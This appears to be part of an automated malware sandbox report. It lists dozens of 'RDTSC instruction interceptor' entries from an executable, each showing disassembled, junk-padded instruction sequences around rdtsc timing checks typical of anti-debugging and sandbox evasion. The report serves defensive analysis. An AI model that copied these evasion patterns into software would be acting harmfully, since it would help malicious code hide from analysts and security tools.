Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71207BB second address: 71207BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71207BF second address: 71207DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+30h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6F951A9EC2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71207DF second address: 71207F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E3Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71207F1 second address: 71207F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71207F5 second address: 7120845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6F946E7E3Dh 0x00000016 sbb ch, 00000066h 0x00000019 jmp 00007F6F946E7E41h 0x0000001e popfd 0x0000001f jmp 00007F6F946E7E40h 0x00000024 popad 0x00000025 mov word ptr [esi+32h], ax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov bl, 66h 0x0000002e mov al, ECh 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120845 second address: 71208F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 pushfd 0x00000006 jmp 00007F6F951A9EC3h 0x0000000b adc si, DEFEh 0x00000010 jmp 00007F6F951A9EC9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebx+0000008Ch] 0x0000001f pushad 0x00000020 jmp 00007F6F951A9EBCh 0x00000025 pushfd 0x00000026 jmp 00007F6F951A9EC2h 0x0000002b adc ah, 00000028h 0x0000002e jmp 00007F6F951A9EBBh 0x00000033 popfd 0x00000034 popad 0x00000035 mov dword ptr [esi+34h], eax 0x00000038 jmp 00007F6F951A9EC6h 0x0000003d mov eax, dword ptr [ebx+18h] 0x00000040 jmp 00007F6F951A9EC0h 0x00000045 mov dword ptr [esi+38h], eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F6F951A9EBAh 0x00000051 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71208F3 second address: 7120902 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120902 second address: 7120908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120908 second address: 7120949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+1Ch] 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 pushfd 0x00000012 jmp 00007F6F946E7E40h 0x00000017 add ch, 00000078h 0x0000001a jmp 00007F6F946E7E3Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [esi+3Ch], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120949 second address: 712094D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712094D second address: 7120953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120AD2 second address: 7120B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F951A9EC8h 0x00000009 and cx, A3F8h 0x0000000e jmp 00007F6F951A9EBBh 0x00000013 popfd 0x00000014 jmp 00007F6F951A9EC8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c js 00007F7005028A5Fh 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6F951A9EBAh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120B2E second address: 7120B3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120B3D second address: 7120B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F951A9EC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120B55 second address: 7120B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-0Ch] 0x0000000e pushad 0x0000000f push esi 0x00000010 mov si, dx 0x00000013 pop ebx 0x00000014 call 00007F6F946E7E3Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120B7D second address: 7120C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esi+04h], eax 0x00000009 jmp 00007F6F951A9EC7h 0x0000000e lea eax, dword ptr [ebx+78h] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F6F951A9EC4h 0x00000018 or ax, C7D8h 0x0000001d jmp 00007F6F951A9EBBh 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F6F951A9EC8h 0x00000029 and esi, 5EDF1238h 0x0000002f jmp 00007F6F951A9EBBh 0x00000034 popfd 0x00000035 popad 0x00000036 push 00000001h 0x00000038 pushad 0x00000039 mov cl, 04h 0x0000003b pushfd 0x0000003c jmp 00007F6F951A9EC1h 0x00000041 sbb ax, B0D6h 0x00000046 jmp 00007F6F951A9EC1h 0x0000004b popfd 0x0000004c popad 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F6F951A9EBDh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120C32 second address: 7120C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120C38 second address: 7120C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120C3C second address: 7120C40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120C40 second address: 7120C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6F951A9EBBh 0x00000012 and ax, 7ABEh 0x00000017 jmp 00007F6F951A9EC9h 0x0000001c popfd 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120C7A second address: 7120C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120C80 second address: 7120C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120C84 second address: 7120C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120C88 second address: 7120C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120D70 second address: 7120DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F6F946E7E42h 0x00000012 call 00007F6F946E7E42h 0x00000017 pop ecx 0x00000018 popad 0x00000019 mov ax, dx 0x0000001c popad 0x0000001d js 00007F7004566736h 0x00000023 pushad 0x00000024 call 00007F6F946E7E43h 0x00000029 pushad 0x0000002a popad 0x0000002b pop ecx 0x0000002c mov edi, 00F6A68Ah 0x00000031 popad 0x00000032 mov eax, dword ptr [ebp-04h] 0x00000035 jmp 00007F6F946E7E41h 0x0000003a mov dword ptr [esi+08h], eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 mov si, 9119h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120DFA second address: 7120E5C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6F951A9EC6h 0x00000008 sub eax, 239A8AA8h 0x0000000e jmp 00007F6F951A9EBBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F6F951A9EC8h 0x0000001c sbb ecx, 0A107D08h 0x00000022 jmp 00007F6F951A9EBBh 0x00000027 popfd 0x00000028 popad 0x00000029 lea eax, dword ptr [ebx+70h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120E5C second address: 7120E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120E60 second address: 7120E7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120E7B second address: 7120E85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0103F40Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120E85 second address: 7120E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000001h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6F951A9EBAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120E9A second address: 7120EF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov si, 7C5Bh 0x0000000f mov ax, 8337h 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F6F946E7E46h 0x0000001c add ecx, 44933758h 0x00000022 jmp 00007F6F946E7E3Bh 0x00000027 popfd 0x00000028 popad 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F6F946E7E40h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120EF5 second address: 7120EFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120EFB second address: 7120F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 popad 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F6F946E7E41h 0x0000001a pop esi 0x0000001b pushfd 0x0000001c jmp 00007F6F946E7E41h 0x00000021 xor ecx, 11194DB6h 0x00000027 jmp 00007F6F946E7E41h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120FED second address: 7120FF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7120FF3 second address: 7121031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007F6F946E7E40h 0x00000011 mov ecx, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6F946E7E47h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121031 second address: 7121059 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 mov esi, ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121171 second address: 71211D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F6F946E7E48h 0x0000000b or esi, 049B8C78h 0x00000011 jmp 00007F6F946E7E3Bh 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [edx], eax 0x0000001a jmp 00007F6F946E7E46h 0x0000001f mov eax, dword ptr [esi+04h] 0x00000022 jmp 00007F6F946E7E40h 0x00000027 mov dword ptr [edx+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov ch, dl 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71211D6 second address: 712126F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 pushfd 0x00000007 jmp 00007F6F951A9EBCh 0x0000000c adc esi, 65FC9868h 0x00000012 jmp 00007F6F951A9EBBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [esi+08h] 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F6F951A9EC4h 0x00000025 or si, 6AC8h 0x0000002a jmp 00007F6F951A9EBBh 0x0000002f popfd 0x00000030 popad 0x00000031 mov dword ptr [edx+08h], eax 0x00000034 pushad 0x00000035 movsx edx, si 0x00000038 mov al, 38h 0x0000003a popad 0x0000003b mov eax, dword ptr [esi+0Ch] 0x0000003e jmp 00007F6F951A9EBFh 0x00000043 mov dword ptr [edx+0Ch], eax 0x00000046 pushad 0x00000047 mov ebx, eax 0x00000049 mov eax, 27ABB617h 0x0000004e popad 0x0000004f mov eax, dword ptr [esi+10h] 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F6F951A9EC9h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712126F second address: 71212B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c jmp 00007F6F946E7E3Eh 0x00000011 mov eax, dword ptr [esi+14h] 0x00000014 jmp 00007F6F946E7E40h 0x00000019 mov dword ptr [edx+14h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6F946E7E3Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71212B9 second address: 71212BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71212BD second address: 71212C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71212C3 second address: 712133E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 pushfd 0x00000006 jmp 00007F6F951A9EC8h 0x0000000b and cl, FFFFFFD8h 0x0000000e jmp 00007F6F951A9EBBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+18h] 0x0000001a jmp 00007F6F951A9EC6h 0x0000001f mov dword ptr [edx+18h], eax 0x00000022 pushad 0x00000023 jmp 00007F6F951A9EBEh 0x00000028 call 00007F6F951A9EC2h 0x0000002d mov bx, si 0x00000030 pop ecx 0x00000031 popad 0x00000032 mov eax, dword ptr [esi+1Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712133E second address: 7121342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121342 second address: 7121358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121358 second address: 71213E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, DCA4h 0x00000007 pushfd 0x00000008 jmp 00007F6F946E7E3Dh 0x0000000d sub ch, FFFFFFE6h 0x00000010 jmp 00007F6F946E7E41h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [edx+1Ch], eax 0x0000001c jmp 00007F6F946E7E3Eh 0x00000021 mov eax, dword ptr [esi+20h] 0x00000024 pushad 0x00000025 pushad 0x00000026 mov di, B21Eh 0x0000002a jmp 00007F6F946E7E3Fh 0x0000002f popad 0x00000030 popad 0x00000031 mov dword ptr [edx+20h], eax 0x00000034 jmp 00007F6F946E7E46h 0x00000039 mov eax, dword ptr [esi+24h] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F6F946E7E47h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71213E5 second address: 71213EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71213EB second address: 71213EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71213EF second address: 71213F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71213F3 second address: 7121419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b pushad 0x0000000c mov esi, ebx 0x0000000e mov bx, 6DBCh 0x00000012 popad 0x00000013 mov eax, dword ptr [esi+28h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6F946E7E3Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121419 second address: 712141F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712141F second address: 7121423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121423 second address: 7121427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121427 second address: 7121455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+28h], eax 0x0000000b jmp 00007F6F946E7E49h 0x00000010 mov ecx, dword ptr [esi+2Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edi 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121455 second address: 712145A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 712145A second address: 7121460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121460 second address: 7121464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121464 second address: 7121479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+2Ch], ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov dx, BDD6h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121479 second address: 7121498 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov bl, 30h 0x00000012 mov esi, 3E0E3C55h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121498 second address: 71214AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E3Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71214AA second address: 71214AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71214AE second address: 71214CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c pushad 0x0000000d call 00007F6F946E7E3Dh 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71214CF second address: 7121512 instructions: 0x00000000 rdtsc 0x00000002 call 00007F6F951A9EC3h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ax, word ptr [esi+32h] 0x0000000f jmp 00007F6F951A9EBFh 0x00000014 mov word ptr [edx+32h], ax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007F6F951A9EBBh 0x00000020 pop eax 0x00000021 mov ax, di 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121512 second address: 7121550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, AFD7h 0x00000007 pushfd 0x00000008 jmp 00007F6F946E7E3Ch 0x0000000d sbb ax, 3A48h 0x00000012 jmp 00007F6F946E7E3Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [esi+34h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F6F946E7E3Eh 0x00000026 pop eax 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 7121550 second address: 71215C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F951A9EBEh 0x00000009 jmp 00007F6F951A9EC5h 0x0000000e popfd 0x0000000f mov cx, 8887h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dword ptr [edx+34h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F6F951A9EBFh 0x00000022 xor esi, 0C951F4Eh 0x00000028 jmp 00007F6F951A9EC9h 0x0000002d popfd 0x0000002e call 00007F6F951A9EC0h 0x00000033 pop eax 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exeRDTSC instruction interceptor: First address: 71215C7 second address: 7121650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 push edx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test ecx, 00000700h 0x00000011 pushad 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 push edi 0x00000017 mov ax, 7C2Fh 0x0000001b pop eax 0x0000001c popad 0x0000001d jne 00007F7004565F69h 0x00000023 pushad 0x00000024 movsx ebx, cx 0x00000027 jmp 00007F6F946E7E3Ah 0x0000002c popad 0x0000002d or dword ptr [edx+38h], FFFFFFFFh 0x00000031 pushad 0x00000032 mov cl, B0h 0x00000034 mov edx, 04FF676Eh 0x00000039 popad 0x0000003a or dword ptr [edx+3Ch], FFFFFFFFh 0x0000003e pushad 0x0000003f mov eax, edi 0x00000041 pushfd 0x00000042 jmp 00007F6F946E7E47h 0x00000047 adc esi, 2CB734CEh 0x0000004d jmp 00007F6F946E7E49h 0x00000052 popfd 0x00000053 popad 0x00000054 or dword ptr [edx+40h], FFFFFFFFh 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
